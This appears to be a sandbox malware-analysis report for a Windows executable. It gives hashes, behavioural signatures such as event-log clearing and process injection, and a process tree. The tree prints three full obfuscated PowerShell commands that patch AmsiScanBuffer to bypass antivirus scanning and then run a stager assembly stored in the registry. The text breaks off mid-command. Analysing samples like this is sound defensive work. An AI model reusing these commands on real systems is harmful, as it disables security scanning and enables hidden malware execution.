Overview

overview

10

Static

static

1

c2d3089e50...75.exe

windows7-x64

10

c2d3089e50...75.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/08/2024, 04:49

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    c2d3089e50c9f65da7c9c1bf85e71638ce37c842d5df7e40ddf1df9e94494775.exe

  • Size

    9.1MB

  • MD5

    01531f20abdc9491ee999b76a00f9730

  • SHA1

    e1e2acdd11475bea11a686f45a2c626efc1a805b

  • SHA256

    c2d3089e50c9f65da7c9c1bf85e71638ce37c842d5df7e40ddf1df9e94494775

  • SHA512

    6e2b9e567efe561e0585e9a058d6f0cc80a8e0318688b5ce711eb9fdb63339401b3f6e005e07c8c8623cebef32d168d98cfbc2af71b06feb79ef23d862b793bd

  • SSDEEP

    196608:HTtTdbHLdDEZslzcepY3EDhKRuJZYYE1H/0zRSY:ztTdbHLdDEZs6eMJ4JZY/MzT

Score
10/10
defense_evasiondiscoveryexecution

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 17 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

    Using powershell.exe command.

    execution
  • Executes dropped EXE 18 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

    defense_evasion
  • Drops file in System32 directory 29 IoCs
  • Suspicious use of SetThreadContext 17 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:64
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{89b0fb13-4320-4db1-8fb9-b19ea916bed8}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:464
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{2c213e40-ba0d-4979-866a-3df2564bae6a}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4512
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{8ad43860-4f58-44e9-b0e6-b6ba8bf031e0}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2468
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{53fed884-f51e-47c5-9084-f5d2464c9806}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3108
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{d45af44f-1461-47e3-a71c-c23132db97e4}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2164
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{8e9d673e-f617-4c41-ac70-bb0ffbaf0667}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3552
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{8fe09c77-cdf2-47b2-a746-88b68e03cb71}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4884
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{2c1d2a50-e4dd-4599-936f-1422d93a4c13}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2164
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{4402710f-7608-4698-96f0-b99576ef63f8}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4476
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{f81d9152-44d9-44b2-ad3e-0e6352a383ea}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3972
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{619a9716-03d6-4ef9-814c-12e9fea729e6}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4584
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{1b9a44b5-605a-4add-b92c-86ba53cc28a7}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4060
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{ff763dfe-e592-42c0-aa27-a74ba55e1ff7}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1436
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{f996a3bf-b1a0-4aba-8e50-75b10472becd}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4712
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{b39f74d8-36e5-40e4-a0fb-bdc955bcfcd3}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4884
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{b5a40b77-f82e-4253-a996-b25d25eccb26}
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:408
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{0d0671d2-f408-4ab6-a0ff-2b5d51bd7f63}
        2⤵
          PID:4064
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:664
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:952
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:384
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:948
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1040
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1052
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1160
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2472
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QahUKDPOZAWr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$sCbgvWMhxOpUiY,[Parameter(Position=1)][Type]$GVONQzPHcU)$cTMOwGPsiNa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'Del'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+'mo'+[Char](114)+'y'+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'el'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+''+'s'+'s'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+'s'+',A'+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$cTMOwGPsiNa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+'i'+'a'+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$sCbgvWMhxOpUiY).SetImplementationFlags('Run'+[Char](116)+''+'i'+''+[Char](109)+'e,'+[Char](77)+''+'a'+'n'+'a'+'g'+[Char](101)+''+'d'+'');$cTMOwGPsiNa.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+'ke',''+[Char](80)+'ub'+'l'+''+[Char](105)+'c'+[Char](44)+''+'H'+'i'+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+'w'+[Char](83)+''+[Char](108)+''+'o'+''+'t'+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+'ua'+'l'+'',$GVONQzPHcU,$sCbgvWMhxOpUiY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+'g'+[Char](101)+''+'d'+'');Write-Output $cTMOwGPsiNa.CreateType();}$TasGwiwWxnltl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Wi'+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+'a'+'f'+[Char](101)+''+'N'+'a'+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$JSPNhmsQDUsAcN=$TasGwiwWxnltl.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'oc'+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+[Char](116)+'a'+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$anfpssIgkkgFoYnBygI=QahUKDPOZAWr @([String])([IntPtr]);$xLTyxCDJLqEPmtPhSLjZLU=QahUKDPOZAWr @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MVGsZbReFeF=$TasGwiwWxnltl.GetMethod(''+[Char](71)+''+'e'+'tM'+[Char](111)+'du'+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$ceoRhAgjCTgUty=$JSPNhmsQDUsAcN.Invoke($Null,@([Object]$MVGsZbReFeF,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+'r'+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$hFynQeoMRmpIgjpkM=$JSPNhmsQDUsAcN.Invoke($Null,@([Object]$MVGsZbReFeF,[Object](''+'V'+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+'r'+''+'o'+'t'+[Char](101)+''+'c'+''+'t'+'')));$rddMKbo=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ceoRhAgjCTgUty,$anfpssIgkkgFoYnBygI).Invoke(''+'a'+''+'m'+''+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$buWWlYjpNeeVrcLHZ=$JSPNhmsQDUsAcN.Invoke($Null,@([Object]$rddMKbo,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+'a'+'n'+''+'B'+''+[Char](117)+''+'f'+''+[Char](102)+'er')));$MsAWqYBZkX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hFynQeoMRmpIgjpkM,$xLTyxCDJLqEPmtPhSLjZLU).Invoke($buWWlYjpNeeVrcLHZ,[uint32]8,4,[ref]$MsAWqYBZkX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$buWWlYjpNeeVrcLHZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hFynQeoMRmpIgjpkM,$xLTyxCDJLqEPmtPhSLjZLU).Invoke($buWWlYjpNeeVrcLHZ,[uint32]8,0x20,[ref]$MsAWqYBZkX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+'T'+''+[Char](87)+''+'A'+'RE').GetValue(''+'$'+''+[Char](55)+'7'+[Char](115)+''+[Char](116)+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2640
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CZMwoXAtIHcv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$nkUzJQUayWzejE,[Parameter(Position=1)][Type]$srpVAzREsN)$VbZSRWpzWoc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+'c'+'t'+'e'+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+'gate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+''+'y'+''+'M'+''+'o'+''+'d'+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+'D'+'e'+''+'l'+''+'e'+'g'+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+','+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+',S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d,'+'A'+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+''+'u'+'toCla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$VbZSRWpzWoc.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+'ial'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$nkUzJQUayWzejE).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+'g'+'e'+'d');$VbZSRWpzWoc.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+'c,H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+'t'+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+'',$srpVAzREsN,$nkUzJQUayWzejE).SetImplementationFlags('R'+'u'+'n'+[Char](116)+'im'+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $VbZSRWpzWoc.CreateType();}$LeudcieQglrmY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+'l'+'l')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+'s'+'o'+''+[Char](102)+'t'+'.'+''+[Char](87)+''+[Char](105)+'n'+'3'+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+'N'+''+[Char](97)+''+'t'+'i'+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$IlmwamzoNizRLj=$LeudcieQglrmY.GetMethod('Get'+'P'+''+'r'+''+'o'+''+[Char](99)+'A'+'d'+'d'+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HjmTVATvhBXyAEewLPu=CZMwoXAtIHcv @([String])([IntPtr]);$WeiYvYnOKoZgliFkTiFuVg=CZMwoXAtIHcv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$noIloqnXfPq=$LeudcieQglrmY.GetMethod(''+[Char](71)+'e'+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+''+[Char](72)+'a'+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')));$swAOPAtdAiCmiA=$IlmwamzoNizRLj.Invoke($Null,@([Object]$noIloqnXfPq,[Object](''+'L'+''+'o'+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$rWavqAXwOtRCQJJmS=$IlmwamzoNizRLj.Invoke($Null,@([Object]$noIloqnXfPq,[Object](''+[Char](86)+''+'i'+''+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'ro'+[Char](116)+'e'+'c'+'t')));$VWwwJai=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($swAOPAtdAiCmiA,$HjmTVATvhBXyAEewLPu).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$jHbLaWzIAtdgmIBve=$IlmwamzoNizRLj.Invoke($Null,@([Object]$VWwwJai,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+'uf'+'f'+''+'e'+''+[Char](114)+'')));$kArItggWID=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rWavqAXwOtRCQJJmS,$WeiYvYnOKoZgliFkTiFuVg).Invoke($jHbLaWzIAtdgmIBve,[uint32]8,4,[ref]$kArItggWID);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jHbLaWzIAtdgmIBve,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rWavqAXwOtRCQJJmS,$WeiYvYnOKoZgliFkTiFuVg).Invoke($jHbLaWzIAtdgmIBve,[uint32]8,0x20,[ref]$kArItggWID);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+'TWA'+[Char](82)+'E').GetValue('$7'+[Char](55)+''+[Char](115)+''+'t'+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4468
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:5024
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZsCSpoiCXpme{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lmsXxhmcRcwkVQ,[Parameter(Position=1)][Type]$IPMLAjkswQ)$UxUpviqJXTY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+'lect'+[Char](101)+''+[Char](100)+'De'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+'e','C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+','+'A'+''+[Char](110)+'s'+'i'+''+'C'+''+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+'C'+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$UxUpviqJXTY.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+'p'+''+'e'+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig,'+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$lmsXxhmcRcwkVQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');$UxUpviqJXTY.DefineMethod('In'+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+[Char](44)+'Hi'+[Char](100)+'eB'+'y'+''+[Char](83)+''+'i'+''+'g'+',N'+[Char](101)+'w'+[Char](83)+''+[Char](108)+'o'+'t'+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$IPMLAjkswQ,$lmsXxhmcRcwkVQ).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+'Ma'+'n'+''+[Char](97)+''+[Char](103)+'e'+'d'+'');Write-Output $UxUpviqJXTY.CreateType();}$zHCkUdBDODbJg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+[Char](116)+'e'+'m'+''+'.'+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+[Char](111)+''+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+''+'n'+''+'3'+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+'ti'+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+'t'+''+'h'+''+'o'+''+[Char](100)+''+[Char](115)+'');$MXBEAUvIkIsQjZ=$zHCkUdBDODbJg.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+'r'+'o'+[Char](99)+''+[Char](65)+''+'d'+'dr'+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+''+'S'+'t'+[Char](97)+'ti'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$NyJgIHZMKLSMHUHVwOv=ZsCSpoiCXpme @([String])([IntPtr]);$DzZCfbMIOgvsUJJotECmKI=ZsCSpoiCXpme @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pDFSbaNwdGy=$zHCkUdBDODbJg.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+'n'+'e'+[Char](108)+''+[Char](51)+'2'+'.'+'d'+[Char](108)+'l')));$epJMjhNgxoYcWf=$MXBEAUvIkIsQjZ.Invoke($Null,@([Object]$pDFSbaNwdGy,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'ry'+[Char](65)+'')));$fAMlMRtcabWytsKeb=$MXBEAUvIkIsQjZ.Invoke($Null,@([Object]$pDFSbaNwdGy,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+'e'+'c'+'t')));$PqWLFdq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($epJMjhNgxoYcWf,$NyJgIHZMKLSMHUHVwOv).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$RSgXQycdMRHgmrJxO=$MXBEAUvIkIsQjZ.Invoke($Null,@([Object]$PqWLFdq,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+'fe'+[Char](114)+'')));$cKzNXgJWAX=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fAMlMRtcabWytsKeb,$DzZCfbMIOgvsUJJotECmKI).Invoke($RSgXQycdMRHgmrJxO,[uint32]8,4,[ref]$cKzNXgJWAX);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RSgXQycdMRHgmrJxO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fAMlMRtcabWytsKeb,$DzZCfbMIOgvsUJJotECmKI).Invoke($RSgXQycdMRHgmrJxO,[uint32]8,0x20,[ref]$cKzNXgJWAX);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[